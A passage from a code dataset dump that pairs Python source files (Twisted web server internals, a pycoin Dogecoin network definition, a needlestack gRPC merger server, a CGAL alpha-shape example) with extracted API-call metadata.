\\n\"\n )\n else:\n body = (\n b\"Processing Failed\"\n b\"\"\n b\"Processing Failed\"\n )\n\n self.setResponseCode(http.INTERNAL_SERVER_ERROR)\n self.setHeader(b\"content-type\", b\"text/html\")\n self.setHeader(b\"content-length\", b\"%d\" % (len(body),))\n self.write(body)\n self.finish()\n return reason\n\n def view_write(self, issuer, data):\n \"\"\"Remote version of write; same interface.\"\"\"\n self.write(data)\n\n def view_finish(self, issuer):\n \"\"\"Remote version of finish; same interface.\"\"\"\n self.finish()\n\n def view_addCookie(self, issuer, k, v, **kwargs):\n \"\"\"Remote version of addCookie; same interface.\"\"\"\n self.addCookie(k, v, **kwargs)\n\n def view_setHeader(self, issuer, k, v):\n \"\"\"Remote version of setHeader; same interface.\"\"\"\n self.setHeader(k, v)\n\n def view_setLastModified(self, issuer, when):\n \"\"\"Remote version of setLastModified; same interface.\"\"\"\n self.setLastModified(when)\n\n def view_setETag(self, issuer, tag):\n \"\"\"Remote version of setETag; same interface.\"\"\"\n self.setETag(tag)\n\n def view_setResponseCode(self, issuer, code, message=None):\n \"\"\"\n Remote version of setResponseCode; same interface.\n \"\"\"\n self.setResponseCode(code, message)\n\n def view_registerProducer(self, issuer, producer, streaming):\n \"\"\"Remote version of registerProducer; same interface.\n (requires a remote producer.)\n \"\"\"\n self.registerProducer(_RemoteProducerWrapper(producer), streaming)\n\n def view_unregisterProducer(self, issuer):\n self.unregisterProducer()\n\n ### these calls remain local\n\n _secureSession = None\n _insecureSession = None\n\n @property\n def session(self):\n \"\"\"\n If a session has already been created or looked up with\n L{Request.getSession}, this will return that object. (This will always\n be the session that matches the security of the request; so if\n C{forceNotSecure} is used on a secure request, this will not return\n that session.)\n\n @return: the session attribute\n @rtype: L{Session} or L{None}\n \"\"\"\n if self.isSecure():\n return self._secureSession\n else:\n return self._insecureSession\n\n def getSession(self, sessionInterface=None, forceNotSecure=False):\n \"\"\"\n Check if there is a session cookie, and if not, create it.\n\n By default, the cookie with be secure for HTTPS requests and not secure\n for HTTP requests. 
If for some reason you need access to the insecure\n cookie from a secure request you can set C{forceNotSecure = True}.\n\n @param forceNotSecure: Should we retrieve a session that will be\n transmitted over HTTP, even if this L{Request} was delivered over\n HTTPS?\n @type forceNotSecure: L{bool}\n \"\"\"\n # Make sure we aren't creating a secure session on a non-secure page\n secure = self.isSecure() and not forceNotSecure\n\n if not secure:\n cookieString = b\"TWISTED_SESSION\"\n sessionAttribute = \"_insecureSession\"\n else:\n cookieString = b\"TWISTED_SECURE_SESSION\"\n sessionAttribute = \"_secureSession\"\n\n session = getattr(self, sessionAttribute)\n\n if session is not None:\n # We have a previously created session.\n try:\n # Refresh the session, to keep it alive.\n session.touch()\n except (AlreadyCalled, AlreadyCancelled):\n # Session has already expired.\n session = None\n\n if session is None:\n # No session was created yet for this request.\n cookiename = b\"_\".join([cookieString] + self.sitepath)\n sessionCookie = self.getCookie(cookiename)\n if sessionCookie:\n try:\n session = self.site.getSession(sessionCookie)\n except KeyError:\n pass\n # if it still hasn't been set, fix it up.\n if not session:\n session = self.site.makeSession()\n self.addCookie(cookiename, session.uid, path=b\"/\", secure=secure)\n\n setattr(self, sessionAttribute, session)\n\n if sessionInterface:\n return session.getComponent(sessionInterface)\n\n return session\n\n def _prePathURL(self, prepath):\n port = self.getHost().port\n if self.isSecure():\n default = 443\n else:\n default = 80\n if port == default:\n hostport = \"\"\n else:\n hostport = \":%d\" % port\n prefix = networkString(\n \"http%s://%s%s/\"\n % (\n self.isSecure() and \"s\" or \"\",\n nativeString(self.getRequestHostname()),\n hostport,\n )\n )\n path = b\"/\".join([quote(segment, safe=b\"\") for segment in prepath])\n return prefix + path\n\n def prePathURL(self):\n return self._prePathURL(self.prepath)\n\n def URLPath(self):\n from twisted.python import urlpath\n\n return urlpath.URLPath.fromRequest(self)\n\n def rememberRootURL(self):\n \"\"\"\n Remember the currently-processed part of the URL for later\n recalling.\n \"\"\"\n url = self._prePathURL(self.prepath[:-1])\n self.appRootURL = url\n\n def getRootURL(self):\n \"\"\"\n Get a previously-remembered URL.\n\n @return: An absolute URL.\n @rtype: L{bytes}\n \"\"\"\n return self.appRootURL\n\n def _handleStar(self):\n \"\"\"\n Handle receiving a request whose path is '*'.\n\n RFC 7231 defines an OPTIONS * request as being something that a client\n can send as a low-effort way to probe server capabilities or readiness.\n Rather than bother the user with this, we simply fast-path it back to\n an empty 200 OK. 
Any non-OPTIONS verb gets a 405 Method Not Allowed\n telling the client they can only use OPTIONS.\n \"\"\"\n if self.method == b\"OPTIONS\":\n self.setResponseCode(http.OK)\n else:\n self.setResponseCode(http.NOT_ALLOWED)\n self.setHeader(b\"Allow\", b\"OPTIONS\")\n\n # RFC 7231 says we MUST set content-length 0 when responding to this\n # with no body.\n self.setHeader(b\"Content-Length\", b\"0\")\n self.finish()\n\n\n@implementer(iweb._IRequestEncoderFactory)\nclass GzipEncoderFactory:\n \"\"\"\n @cvar compressLevel: The compression level used by the compressor, default\n to 9 (highest).\n\n @since: 12.3\n \"\"\"\n\n _gzipCheckRegex = re.compile(br\"(:?^|[\\s,])gzip(:?$|[\\s,])\")\n compressLevel = 9\n\n def encoderForRequest(self, request):\n \"\"\"\n Check the headers if the client accepts gzip encoding, and encodes the\n request if so.\n \"\"\"\n acceptHeaders = b\",\".join(\n request.requestHeaders.getRawHeaders(b\"accept-encoding\", [])\n )\n if self._gzipCheckRegex.search(acceptHeaders):\n encoding = request.responseHeaders.getRawHeaders(b\"content-encoding\")\n if encoding:\n encoding = b\",\".join(encoding + [b\"gzip\"])\n else:\n encoding = b\"gzip\"\n\n request.responseHeaders.setRawHeaders(b\"content-encoding\", [encoding])\n return _GzipEncoder(self.compressLevel, request)\n\n\n@implementer(iweb._IRequestEncoder)\nclass _GzipEncoder:\n \"\"\"\n An encoder which supports gzip.\n\n @ivar _zlibCompressor: The zlib compressor instance used to compress the\n stream.\n\n @ivar _request: A reference to the originating request.\n\n @since: 12.3\n \"\"\"\n\n _zlibCompressor = None\n\n def __init__(self, compressLevel, request):\n self._zlibCompressor = zlib.compressobj(\n compressLevel, zlib.DEFLATED, 16 + zlib.MAX_WBITS\n )\n self._request = request\n\n def encode(self, data):\n \"\"\"\n Write to the request, automatically compressing data on the fly.\n \"\"\"\n if not self._request.startedWriting:\n # Remove the content-length header, we can't honor it\n # because we compress on the fly.\n self._request.responseHeaders.removeHeader(b\"content-length\")\n return self._zlibCompressor.compress(data)\n\n def finish(self):\n \"\"\"\n Finish handling the request request, flushing any data from the zlib\n buffer.\n \"\"\"\n remain = self._zlibCompressor.flush()\n self._zlibCompressor = None\n return remain\n\n\nclass _RemoteProducerWrapper:\n def __init__(self, remote):\n self.resumeProducing = remote.remoteMethod(\"resumeProducing\")\n self.pauseProducing = remote.remoteMethod(\"pauseProducing\")\n self.stopProducing = remote.remoteMethod(\"stopProducing\")\n\n\nclass Session(components.Componentized):\n \"\"\"\n A user's session with a system.\n\n This utility class contains no functionality, but is used to\n represent a session.\n\n @ivar site: The L{Site} that generated the session.\n @type site: L{Site}\n\n @ivar uid: A unique identifier for the session.\n @type uid: L{bytes}\n\n @ivar _reactor: An object providing L{IReactorTime} to use for scheduling\n expiration.\n\n @ivar sessionTimeout: Time after last modification the session will expire,\n in seconds.\n @type sessionTimeout: L{float}\n\n @ivar lastModified: Time the C{touch()} method was last called (or time the\n session was created). 
A UNIX timestamp as returned by\n L{IReactorTime.seconds()}.\n @type lastModified: L{float}\n \"\"\"\n\n sessionTimeout = 900\n\n _expireCall = None\n\n def __init__(self, site, uid, reactor=None):\n \"\"\"\n Initialize a session with a unique ID for that session.\n\n @param reactor: L{IReactorTime} used to schedule expiration of the\n session. If C{None}, the reactor associated with I{site} is used.\n \"\"\"\n super().__init__()\n\n if reactor is None:\n reactor = site.reactor\n self._reactor = reactor\n\n self.site = site\n self.uid = uid\n self.expireCallbacks = []\n self.touch()\n self.sessionNamespaces = {}\n\n def startCheckingExpiration(self):\n \"\"\"\n Start expiration tracking.\n\n @return: L{None}\n \"\"\"\n self._expireCall = self._reactor.callLater(self.sessionTimeout, self.expire)\n\n def notifyOnExpire(self, callback):\n \"\"\"\n Call this callback when the session expires or logs out.\n \"\"\"\n self.expireCallbacks.append(callback)\n\n def expire(self):\n \"\"\"\n Expire/logout of the session.\n \"\"\"\n del self.site.sessions[self.uid]\n for c in self.expireCallbacks:\n c()\n self.expireCallbacks = []\n if self._expireCall and self._expireCall.active():\n self._expireCall.cancel()\n # Break reference cycle.\n self._expireCall = None\n\n def touch(self):\n \"\"\"\n Mark the session as modified, which resets expiration timer.\n \"\"\"\n self.lastModified = self._reactor.seconds()\n if self._expireCall is not None:\n self._expireCall.reset(self.sessionTimeout)\n\n\nversion = networkString(f\"TwistedWeb/{copyright.version}\")\n\n\n@implementer(interfaces.IProtocolNegotiationFactory)\nclass Site(http.HTTPFactory):\n \"\"\"\n A web site: manage log, sessions, and resources.\n\n @ivar requestFactory: A factory which is called with (channel)\n and creates L{Request} instances. Default to L{Request}.\n\n @ivar displayTracebacks: If set, unhandled exceptions raised during\n rendering are returned to the client as HTML. Default to C{False}.\n\n @ivar sessionFactory: factory for sessions objects. Default to L{Session}.\n\n @ivar sessions: Mapping of session IDs to objects returned by\n C{sessionFactory}.\n @type sessions: L{dict} mapping L{bytes} to L{Session} given the default\n C{sessionFactory}\n\n @ivar counter: The number of sessions that have been generated.\n @type counter: L{int}\n\n @ivar sessionCheckTime: Deprecated and unused. See\n L{Session.sessionTimeout} instead.\n \"\"\"\n\n counter = 0\n requestFactory = Request\n displayTracebacks = False\n sessionFactory = Session\n sessionCheckTime = 1800\n _entropy = os.urandom\n\n def __init__(self, resource, requestFactory=None, *args, **kwargs):\n \"\"\"\n @param resource: The root of the resource hierarchy. 
All request\n traversal for requests received by this factory will begin at this\n resource.\n @type resource: L{IResource} provider\n @param requestFactory: Overwrite for default requestFactory.\n @type requestFactory: C{callable} or C{class}.\n\n @see: L{twisted.web.http.HTTPFactory.__init__}\n \"\"\"\n super().__init__(*args, **kwargs)\n self.sessions = {}\n self.resource = resource\n if requestFactory is not None:\n self.requestFactory = requestFactory\n\n def _openLogFile(self, path):\n from twisted.python import logfile\n\n return logfile.LogFile(os.path.basename(path), os.path.dirname(path))\n\n def __getstate__(self):\n d = self.__dict__.copy()\n d[\"sessions\"] = {}\n return d\n\n def _mkuid(self):\n \"\"\"\n (internal) Generate an opaque, unique ID for a user's session.\n \"\"\"\n self.counter = self.counter + 1\n return hexlify(self._entropy(32))\n\n def makeSession(self):\n \"\"\"\n Generate a new Session instance, and store it for future reference.\n \"\"\"\n uid = self._mkuid()\n session = self.sessions[uid] = self.sessionFactory(self, uid)\n session.startCheckingExpiration()\n return session\n\n def getSession(self, uid):\n \"\"\"\n Get a previously generated session.\n\n @param uid: Unique ID of the session.\n @type uid: L{bytes}.\n\n @raise KeyError: If the session is not found.\n \"\"\"\n return self.sessions[uid]\n\n def buildProtocol(self, addr):\n \"\"\"\n Generate a channel attached to this site.\n \"\"\"\n channel = super().buildProtocol(addr)\n channel.requestFactory = self.requestFactory\n channel.site = self\n return channel\n\n isLeaf = 0\n\n def render(self, request):\n \"\"\"\n Redirect because a Site is always a directory.\n \"\"\"\n request.redirect(request.prePathURL() + b\"/\")\n request.finish()\n\n def getChildWithDefault(self, pathEl, request):\n \"\"\"\n Emulate a resource's getChild method.\n \"\"\"\n request.site = self\n return self.resource.getChildWithDefault(pathEl, request)\n\n def getResourceFor(self, request):\n \"\"\"\n Get a resource for a request.\n\n This iterates through the resource hierarchy, calling\n getChildWithDefault on each resource it finds for a path element,\n stopping when it hits an element where isLeaf is true.\n \"\"\"\n request.site = self\n # Sitepath is used to determine cookie names between distributed\n # servers and disconnected sites.\n request.sitepath = copy.copy(request.prepath)\n return resource.getChildForRequest(self.resource, request)\n\n # IProtocolNegotiationFactory\n def acceptableProtocols(self):\n \"\"\"\n Protocols this server can speak.\n \"\"\"\n baseProtocols = [b\"http/1.1\"]\n\n if http.H2_ENABLED:\n baseProtocols.insert(0, b\"h2\")\n\n return baseProtocols\n"},"apis":{"kind":"list like","value":["twisted.python.components.Componentized.__init__","twisted.python.urlpath.URLPath.fromRequest","re.compile","twisted.logger.Logger","twisted.web.resource.getChildForRequest","twisted.web.http.Request.gotLength","copy.copy","zlib.compressobj","twisted.web.resource._IEncodingResource.providedBy","twisted.spread.pb.ViewPoint","incremental.Version","os.path.dirname","twisted.python.failure.Failure","twisted.python.compat.nativeString","twisted.python.reflect.safe_repr","twisted.web.http.Request.finish","twisted.web.resource.ErrorPage","zope.interface.implementer","twisted.web.http.datetimeToString","twisted.python.compat.networkString","twisted.web.http.Request.__init__","os.path.basename","twisted.web.util.formatFailure","twisted.web.http.Request.write"],"string":"[\n 
\"twisted.python.components.Componentized.__init__\",\n \"twisted.python.urlpath.URLPath.fromRequest\",\n \"re.compile\",\n \"twisted.logger.Logger\",\n \"twisted.web.resource.getChildForRequest\",\n \"twisted.web.http.Request.gotLength\",\n \"copy.copy\",\n \"zlib.compressobj\",\n \"twisted.web.resource._IEncodingResource.providedBy\",\n \"twisted.spread.pb.ViewPoint\",\n \"incremental.Version\",\n \"os.path.dirname\",\n \"twisted.python.failure.Failure\",\n \"twisted.python.compat.nativeString\",\n \"twisted.python.reflect.safe_repr\",\n \"twisted.web.http.Request.finish\",\n \"twisted.web.resource.ErrorPage\",\n \"zope.interface.implementer\",\n \"twisted.web.http.datetimeToString\",\n \"twisted.python.compat.networkString\",\n \"twisted.web.http.Request.__init__\",\n \"os.path.basename\",\n \"twisted.web.util.formatFailure\",\n \"twisted.web.http.Request.write\"\n]"},"extract_api":{"kind":"string","value":"[((2482, 2508), 'zope.interface.implementer', 'implementer', (['iweb.IRequest'], {}), '(iweb.IRequest)\\n', (2493, 2508), False, 'from zope.interface import implementer\\n'), ((20318, 20359), 'zope.interface.implementer', 'implementer', (['iweb._IRequestEncoderFactory'], {}), '(iweb._IRequestEncoderFactory)\\n', (20329, 20359), False, 'from zope.interface import implementer\\n'), ((21320, 21354), 'zope.interface.implementer', 'implementer', (['iweb._IRequestEncoder'], {}), '(iweb._IRequestEncoder)\\n', (21331, 21354), False, 'from zope.interface import implementer\\n'), ((25192, 25240), 'twisted.python.compat.networkString', 'networkString', (['f\"\"\"TwistedWeb/{copyright.version}\"\"\"'], {}), \"(f'TwistedWeb/{copyright.version}')\\n\", (25205, 25240), False, 'from twisted.python.compat import networkString, nativeString\\n'), ((25244, 25295), 'zope.interface.implementer', 'implementer', (['interfaces.IProtocolNegotiationFactory'], {}), '(interfaces.IProtocolNegotiationFactory)\\n', (25255, 25295), False, 'from zope.interface import implementer\\n'), ((1605, 1633), 'incremental.Version', 'Version', (['\"\"\"Twisted\"\"\"', '(12)', '(1)', '(0)'], {}), \"('Twisted', 12, 1, 0)\\n\", (1612, 1633), False, 'from incremental import Version\\n'), ((1778, 1806), 'incremental.Version', 'Version', (['\"\"\"Twisted\"\"\"', '(12)', '(1)', '(0)'], {}), \"('Twisted', 12, 1, 0)\\n\", (1785, 1806), False, 'from incremental import Version\\n'), ((3294, 3302), 'twisted.logger.Logger', 'Logger', ([], {}), '()\\n', (3300, 3302), False, 'from twisted.logger import Logger\\n'), ((20546, 20589), 're.compile', 're.compile', ([\"b'(:?^|[\\\\\\\\s,])gzip(:?$|[\\\\\\\\s,])'\"], {}), \"(b'(:?^|[\\\\\\\\s,])gzip(:?$|[\\\\\\\\s,])')\\n\", (20556, 20589), False, 'import re\\n'), ((3349, 3389), 'twisted.web.http.Request.__init__', 'http.Request.__init__', (['self', '*args'], {}), '(self, *args, **kw)\\n', (3370, 3389), False, 'from twisted.web import iweb, http, util\\n'), ((3398, 3437), 'twisted.python.components.Componentized.__init__', 'components.Componentized.__init__', (['self'], {}), '(self)\\n', (3431, 3437), False, 'from twisted.python import reflect, failure, components\\n'), ((3802, 3825), 'twisted.spread.pb.ViewPoint', 'ViewPoint', (['issuer', 'self'], {}), '(issuer, self)\\n', (3811, 3825), False, 'from twisted.spread.pb import Copyable, ViewPoint\\n'), ((8744, 8769), 'twisted.web.http.Request.finish', 'http.Request.finish', (['self'], {}), '(self)\\n', (8763, 8769), False, 'from twisted.web import iweb, http, util\\n'), ((19036, 19069), 'twisted.python.urlpath.URLPath.fromRequest', 
'urlpath.URLPath.fromRequest', (['self'], {}), '(self)\\n', (19063, 19069), False, 'from twisted.python import urlpath\\n'), ((21708, 21775), 'zlib.compressobj', 'zlib.compressobj', (['compressLevel', 'zlib.DEFLATED', '(16 + zlib.MAX_WBITS)'], {}), '(compressLevel, zlib.DEFLATED, 16 + zlib.MAX_WBITS)\\n', (21724, 21775), False, 'import zlib\\n'), ((29168, 29194), 'copy.copy', 'copy.copy', (['request.prepath'], {}), '(request.prepath)\\n', (29177, 29194), False, 'import copy\\n'), ((29210, 29261), 'twisted.web.resource.getChildForRequest', 'resource.getChildForRequest', (['self.resource', 'request'], {}), '(self.resource, request)\\n', (29237, 29261), False, 'from twisted.web import resource\\n'), ((6104, 6127), 'twisted.web.http.datetimeToString', 'http.datetimeToString', ([], {}), '()\\n', (6125, 6127), False, 'from twisted.web import iweb, http, util\\n'), ((6477, 6522), 'twisted.web.resource._IEncodingResource.providedBy', 'resource._IEncodingResource.providedBy', (['resrc'], {}), '(resrc)\\n', (6515, 6522), False, 'from twisted.web import resource\\n'), ((8452, 8482), 'twisted.web.http.Request.write', 'http.Request.write', (['self', 'data'], {}), '(self, data)\\n', (8470, 8482), False, 'from twisted.web import iweb, http, util\\n'), ((27104, 27126), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\\n', (27120, 27126), False, 'import os\\n'), ((27128, 27149), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\\n', (27143, 27149), False, 'import os\\n'), ((5578, 5614), 'twisted.web.http.Request.gotLength', 'http.Request.gotLength', (['self', 'length'], {}), '(self, length)\\n', (5600, 5614), False, 'from twisted.web import iweb, http, util\\n'), ((8698, 8728), 'twisted.web.http.Request.write', 'http.Request.write', (['self', 'data'], {}), '(self, data)\\n', (8716, 8728), False, 'from twisted.web import iweb, http, util\\n'), ((6752, 6769), 'twisted.python.failure.Failure', 'failure.Failure', ([], {}), '()\\n', (6767, 6769), False, 'from twisted.python import reflect, failure, components\\n'), ((11281, 11342), 'twisted.web.resource.ErrorPage', 'resource.ErrorPage', (['http.NOT_ALLOWED', '\"\"\"Method Not Allowed\"\"\"', 's'], {}), \"(http.NOT_ALLOWED, 'Method Not Allowed', s)\\n\", (11299, 11342), False, 'from twisted.web import resource\\n'), ((13642, 13668), 'twisted.web.util.formatFailure', 'util.formatFailure', (['reason'], {}), '(reason)\\n', (13660, 13668), False, 'from twisted.web import iweb, http, util\\n'), ((11024, 11049), 'twisted.python.compat.nativeString', 'nativeString', (['self.method'], {}), '(self.method)\\n', (11036, 11049), False, 'from twisted.python.compat import networkString, nativeString\\n'), ((10965, 10987), 'twisted.python.compat.nativeString', 'nativeString', (['self.uri'], {}), '(self.uri)\\n', (10977, 10987), False, 'from twisted.python.compat import networkString, nativeString\\n'), ((12242, 12265), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['body'], {}), '(body)\\n', (12259, 12265), False, 'from twisted.python import reflect, failure, components\\n'), ((11174, 11189), 'twisted.python.compat.nativeString', 'nativeString', (['x'], {}), '(x)\\n', (11186, 11189), False, 'from twisted.python.compat import networkString, nativeString\\n'), ((12133, 12157), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['resrc'], {}), '(resrc)\\n', (12150, 12157), False, 'from twisted.python import reflect, failure, components\\n'), ((12022, 12045), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['self'], {}), 
'(self)\\n', (12039, 12045), False, 'from twisted.python import reflect, failure, components\\n')]"}}},{"rowIdx":707,"cells":{"code":{"kind":"string","value":"from pycoin.networks.bitcoinish import create_bitcoinish_network\n\nnetwork = create_bitcoinish_network(\n symbol=\"DOGE\", network_name=\"Dogecoin\", subnet_name=\"mainnet\",\n wif_prefix_hex=\"9e\", address_prefix_hex=\"1e\", pay_to_script_prefix_hex=\"16\",\n bip32_prv_prefix_hex=\"\", bip32_pub_prefix_hex=\"\")\n"},"apis":{"kind":"list like","value":["pycoin.networks.bitcoinish.create_bitcoinish_network"],"string":"[\n \"pycoin.networks.bitcoinish.create_bitcoinish_network\"\n]"},"extract_api":{"kind":"string","value":"[((76, 313), 'pycoin.networks.bitcoinish.create_bitcoinish_network', 'create_bitcoinish_network', ([], {'symbol': '\"\"\"DOGE\"\"\"', 'network_name': '\"\"\"Dogecoin\"\"\"', 'subnet_name': '\"\"\"mainnet\"\"\"', 'wif_prefix_hex': '\"\"\"9e\"\"\"', 'address_prefix_hex': '\"\"\"1e\"\"\"', 'pay_to_script_prefix_hex': '\"\"\"16\"\"\"', 'bip32_prv_prefix_hex': '\"\"\"\"\"\"', 'bip32_pub_prefix_hex': '\"\"\"\"\"\"'}), \"(symbol='DOGE', network_name='Dogecoin',\\n subnet_name='mainnet', wif_prefix_hex='9e', address_prefix_hex='1e',\\n pay_to_script_prefix_hex='16', bip32_prv_prefix_hex='',\\n bip32_pub_prefix_hex='')\\n\", (101, 313), False, 'from pycoin.networks.bitcoinish import create_bitcoinish_network\\n')]"}}},{"rowIdx":708,"cells":{"code":{"kind":"string","value":"import logging\n\nfrom grpc_health.v1 import health_pb2, health_pb2_grpc\nfrom grpc_health.v1.health import HealthServicer\n\nfrom needlestack.apis import servicers_pb2_grpc\nfrom needlestack.servicers import factory\nfrom needlestack.servicers.merger import MergerServicer\n\nfrom examples import configs\n\nlogging.getLogger(\"kazoo\").setLevel(\"WARN\")\n\n\ndef main():\n config = configs.LocalDockerConfig()\n\n server = factory.create_server(config)\n manager = factory.create_zookeeper_cluster_manager(config)\n manager.startup()\n\n servicers_pb2_grpc.add_MergerServicer_to_server(MergerServicer(config, manager), server)\n\n health = HealthServicer()\n health_pb2_grpc.add_HealthServicer_to_server(health, server)\n health.set(\"Merger\", health_pb2.HealthCheckResponse.SERVING)\n\n factory.serve(server)\n\n\nif __name__ == \"__main__\":\n main()\n"},"apis":{"kind":"list like","value":["examples.configs.LocalDockerConfig","logging.getLogger","needlestack.servicers.factory.create_zookeeper_cluster_manager","needlestack.servicers.merger.MergerServicer","grpc_health.v1.health.HealthServicer","needlestack.servicers.factory.serve","needlestack.servicers.factory.create_server","grpc_health.v1.health_pb2_grpc.add_HealthServicer_to_server"],"string":"[\n \"examples.configs.LocalDockerConfig\",\n \"logging.getLogger\",\n \"needlestack.servicers.factory.create_zookeeper_cluster_manager\",\n \"needlestack.servicers.merger.MergerServicer\",\n \"grpc_health.v1.health.HealthServicer\",\n \"needlestack.servicers.factory.serve\",\n \"needlestack.servicers.factory.create_server\",\n \"grpc_health.v1.health_pb2_grpc.add_HealthServicer_to_server\"\n]"},"extract_api":{"kind":"string","value":"[((369, 396), 'examples.configs.LocalDockerConfig', 'configs.LocalDockerConfig', ([], {}), '()\\n', (394, 396), False, 'from examples import configs\\n'), ((411, 440), 'needlestack.servicers.factory.create_server', 'factory.create_server', (['config'], {}), '(config)\\n', (432, 440), False, 'from needlestack.servicers import factory\\n'), ((455, 503), 
'needlestack.servicers.factory.create_zookeeper_cluster_manager', 'factory.create_zookeeper_cluster_manager', (['config'], {}), '(config)\\n', (495, 503), False, 'from needlestack.servicers import factory\\n'), ((634, 650), 'grpc_health.v1.health.HealthServicer', 'HealthServicer', ([], {}), '()\\n', (648, 650), False, 'from grpc_health.v1.health import HealthServicer\\n'), ((655, 715), 'grpc_health.v1.health_pb2_grpc.add_HealthServicer_to_server', 'health_pb2_grpc.add_HealthServicer_to_server', (['health', 'server'], {}), '(health, server)\\n', (699, 715), False, 'from grpc_health.v1 import health_pb2, health_pb2_grpc\\n'), ((786, 807), 'needlestack.servicers.factory.serve', 'factory.serve', (['server'], {}), '(server)\\n', (799, 807), False, 'from needlestack.servicers import factory\\n'), ((298, 324), 'logging.getLogger', 'logging.getLogger', (['\"\"\"kazoo\"\"\"'], {}), \"('kazoo')\\n\", (315, 324), False, 'import logging\\n'), ((579, 610), 'needlestack.servicers.merger.MergerServicer', 'MergerServicer', (['config', 'manager'], {}), '(config, manager)\\n', (593, 610), False, 'from needlestack.servicers.merger import MergerServicer\\n')]"}}},{"rowIdx":709,"cells":{"code":{"kind":"string","value":"from CGAL.CGAL_Kernel import Point_2\nfrom CGAL.CGAL_Kernel import Weighted_point_2\nfrom CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2\nfrom CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2\nfrom CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2_Face_handle\nfrom CGAL.CGAL_Alpha_shape_2 import GENERAL, EXTERIOR, SINGULAR, REGULAR, INTERIOR\nfrom CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Vertex_handle\nfrom CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Face_handle\nfrom CGAL.CGAL_Alpha_shape_2 import Face_Interval_3\n\n\nlst = []\nlst.append(Point_2(0, 0))\nlst.append(Point_2(0, 4))\nlst.append(Point_2(44, 0))\nlst.append(Point_2(44, 5))\nlst.append(Point_2(444, 51))\nlst.append(Point_2(14, 1))\n\nt = Alpha_shape_2(lst, 0, GENERAL)\nt2 = Alpha_shape_2(lst, 0)\nt.clear()\nt.make_alpha_shape(lst)\n\n\nfor d in t.alpha():\n print(d)\n\n\nfor v in t.finite_vertices():\n type = t.classify(v)\n print(v.get_range()[0])\n\n if type == INTERIOR:\n print(\"INTERIOR\")\n elif type == SINGULAR:\n print(\"SINGULAR\")\n elif type == REGULAR:\n print(\"REGULAR\")\n elif type == EXTERIOR:\n print(\"EXTERIOR\")\n\n\nfor f in t.finite_faces():\n i = f.get_ranges(0)\n print(i.first)\n print(i.second)\n print(i.third)\n\n\nwas = Weighted_alpha_shape_2()\nlst_wp = []\nlst_wp.append(Weighted_point_2(Point_2(0, 0), 1))\nlst_wp.append(Weighted_point_2(Point_2(0, 4), 1))\nlst_wp.append(Weighted_point_2(Point_2(44, 0), 1))\nlst_wp.append(Weighted_point_2(Point_2(44, 5), 1))\nlst_wp.append(Weighted_point_2(Point_2(444, 51), 1))\nlst_wp.append(Weighted_point_2(Point_2(14, 1), 1))\n\nwas.make_alpha_shape(lst_wp)\n"},"apis":{"kind":"list like","value":["CGAL.CGAL_Kernel.Point_2","CGAL.CGAL_Alpha_shape_2.Alpha_shape_2","CGAL.CGAL_Alpha_shape_2.Weighted_alpha_shape_2"],"string":"[\n \"CGAL.CGAL_Kernel.Point_2\",\n \"CGAL.CGAL_Alpha_shape_2.Alpha_shape_2\",\n \"CGAL.CGAL_Alpha_shape_2.Weighted_alpha_shape_2\"\n]"},"extract_api":{"kind":"string","value":"[((702, 732), 'CGAL.CGAL_Alpha_shape_2.Alpha_shape_2', 'Alpha_shape_2', (['lst', '(0)', 'GENERAL'], {}), '(lst, 0, GENERAL)\\n', (715, 732), False, 'from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2\\n'), ((738, 759), 'CGAL.CGAL_Alpha_shape_2.Alpha_shape_2', 'Alpha_shape_2', (['lst', '(0)'], {}), '(lst, 0)\\n', (751, 759), False, 'from CGAL.CGAL_Alpha_shape_2 import 
Alpha_shape_2\\n'), ((1242, 1266), 'CGAL.CGAL_Alpha_shape_2.Weighted_alpha_shape_2', 'Weighted_alpha_shape_2', ([], {}), '()\\n', (1264, 1266), False, 'from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2\\n'), ((546, 559), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(0)'], {}), '(0, 0)\\n', (553, 559), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((572, 585), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(4)'], {}), '(0, 4)\\n', (579, 585), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((598, 612), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(0)'], {}), '(44, 0)\\n', (605, 612), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((625, 639), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(5)'], {}), '(44, 5)\\n', (632, 639), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((652, 668), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(444)', '(51)'], {}), '(444, 51)\\n', (659, 668), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((681, 695), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(14)', '(1)'], {}), '(14, 1)\\n', (688, 695), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((1310, 1323), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(0)'], {}), '(0, 0)\\n', (1317, 1323), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((1360, 1373), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(4)'], {}), '(0, 4)\\n', (1367, 1373), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((1410, 1424), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(0)'], {}), '(44, 0)\\n', (1417, 1424), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((1461, 1475), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(5)'], {}), '(44, 5)\\n', (1468, 1475), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((1512, 1528), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(444)', '(51)'], {}), '(444, 51)\\n', (1519, 1528), False, 'from 